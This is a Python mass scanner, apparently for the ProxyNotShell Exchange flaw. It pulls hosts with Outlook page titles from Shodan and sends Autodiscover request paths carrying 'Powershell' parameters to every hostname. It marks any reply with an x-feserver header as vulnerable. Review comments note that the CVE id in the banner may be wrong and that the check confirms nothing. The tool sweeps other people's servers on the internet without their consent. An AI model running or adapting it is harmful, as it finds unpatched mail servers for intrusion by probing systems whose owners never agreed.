'''
/$$ /$$
|__/ | $$
/$$ /$$$$$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$
| $$ /$$__ $$ /$$_____/| $$__ $$ /$$__ $$| $$ | $$| $$__ $$ /$$__ $$
| $$| $$ \ $$| $$$$$$ | $$ \ $$| $$ \__/| $$ | $$| $$ \ $$| $$ \ $$
| $$| $$ | $$ \____ $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$ | $$
| $$| $$$$$$$/ /$$$$$$$/| $$$$$$$/| $$ | $$$$$$/| $$ | $$| $$$$$$/
|__/| $$____/ |_______/ |_______/ |__/ \______/ |__/ |__/ \______/
| $$
| $$
|__/
CVE-2022-40140 MASS SCANNER
'''
import grequests
import requests
from shodan import Shodan
import uuid
import logging
import urllib3
import urllib
import time
import argparse
from urllib.parse import urlsplit, urlunsplit
# Shodan client used by main(). The key is a placeholder literal.
# NOTE(review): a real key pasted here ends up in version control; load it from
# the environment or from a file kept outside the repository instead.
api = Shodan('YOUR SHODAN API KEY')

# Request paths appended to every candidate URL in main(). All of them target
# the Autodiscover endpoint and carry "Powershell" (once percent-encoded as
# "%50owershell") in the query string, so requests made by this script show up
# in web-server access logs as GETs for /autodiscover/autodiscover.json with
# those query parameters.
# NOTE(review): the first entry contains "[email protected]", which looks like the
# hosting page's e-mail obfuscation replacing part of the original string. It is
# kept exactly as rendered here; compare against the upstream file.
# NOTE(review): these are Exchange Autodiscover/OWA paths; confirm that the CVE
# id in the banner above is the identifier of the issue actually being checked.
payloads = [
    "/autodiscover/[email protected]/owa/?&Email=autodiscover/[email protected]&Protocol=XYZ&FooProtocol=Powershell",
    "/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=Powershell",
    "/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=%50owershell",
]

# Shodan search filter: hosts whose HTTP page title contains "Outlook".
dork = "http.title:\"Outlook\""

# Hostnames already queued, shared across result pages by main().
repeated = []

# Silences urllib3's InsecureRequestWarning for the whole process.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
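def do_something(r):
    """Print a line for a response that carries an ``x-feserver`` header.

    Args:
        r: A response object, or ``None`` when a request produced no
            response. The object must be truthy before its headers are read;
            for ``requests`` responses truthiness follows ``ok``, so error
            statuses are skipped as well.

    Returns:
        None. A matching response is reported on stdout as its URL, the text
        `` VULNERABLE`` and its status code.

    NOTE(review): the only thing tested is that the header is present on a
    truthy response. Nothing about the patch level of the server is inspected,
    so a printed line is a candidate for manual verification, not a
    confirmation, and no output is not evidence that a host is fixed.
    """
    # ``None`` is a singleton, so compare by identity rather than with ``!=``.
    if r is None or not r:
        return
    if 'x-feserver' in r.headers:
        print(r.url, ' VULNERABLE', r.status_code)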
def base_url(url, with_path=False):
    """Return *url* reduced to its scheme and network location.

    Args:
        url: The URL to trim.
        with_path: When true, keep the path up to (not including) its last
            ``/``-separated segment; otherwise drop the path entirely.

    Returns:
        The rebuilt URL with params, query and fragment removed.
    """
    parts = urllib.parse.urlparse(url)
    if with_path:
        # Drop only the final path segment.
        kept_path = '/'.join(parts.path.split('/')[:-1])
    else:
        kept_path = ''
    trimmed = parts._replace(path=kept_path, params='', query='', fragment='')
    return trimmed.geturl()
def main():
    """Page through Shodan results and request each payload path per hostname.

    For result pages 0 through 99 of the module-level ``dork`` query, the
    hostnames listed in each banner are collected, four URLs are built per
    hostname (http and https, with and without the banner's port), every entry
    of ``payloads`` is requested on each URL, and each result is handed to
    ``do_something``.

    Traffic profile, as visible in the request call below: plain GETs with a
    fixed Firefox 105 User-Agent, redirects not followed, a 10 second timeout,
    and certificate verification switched on for URLs containing ``https``.

    NOTE(review): requests that fail (for example on a certificate that does
    not verify) presumably come back from ``grequests.map`` as ``None`` and
    are dropped by ``do_something``, so a host that prints nothing has not
    necessarily been checked. Confirm against the installed grequests version.
    NOTE(review): the duplicate check compares the raw hostname against the
    normalised values stored in ``repeated``.
    """
    first_page, page_limit = 0, 100
    request_headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0'}

    for page in range(first_page, page_limit):
        search_result = api.search(dork, page=page)
        print('Pagina ', page)

        # URLs are rebuilt for every page; ``repeated`` persists across pages.
        targets = []
        for banner in search_result["matches"]:
            if 'hostnames' not in banner:
                continue
            for hostname in banner["hostnames"]:
                if hostname in repeated:
                    continue
                # Round-trip through base_url() to strip anything after the host.
                hostname = (base_url('http://' + hostname)).split("http://")[1]
                repeated.append(hostname)
                port_suffix = ':' + str(banner["port"])
                targets.extend([
                    'http://' + hostname,
                    'https://' + hostname,
                    'http://' + hostname + port_suffix,
                    'https://' + hostname + port_suffix,
                ])

        for payload in payloads:
            pending = (
                grequests.get(
                    u + payload,
                    headers=request_headers,
                    allow_redirects=False,
                    timeout=10,
                    verify='https' in u,
                )
                for u in targets
            )
            for response in grequests.map(pending):
                do_something(response)
# Start the scan only when this file is executed directly, not on import.
if __name__ == '__main__':
    main()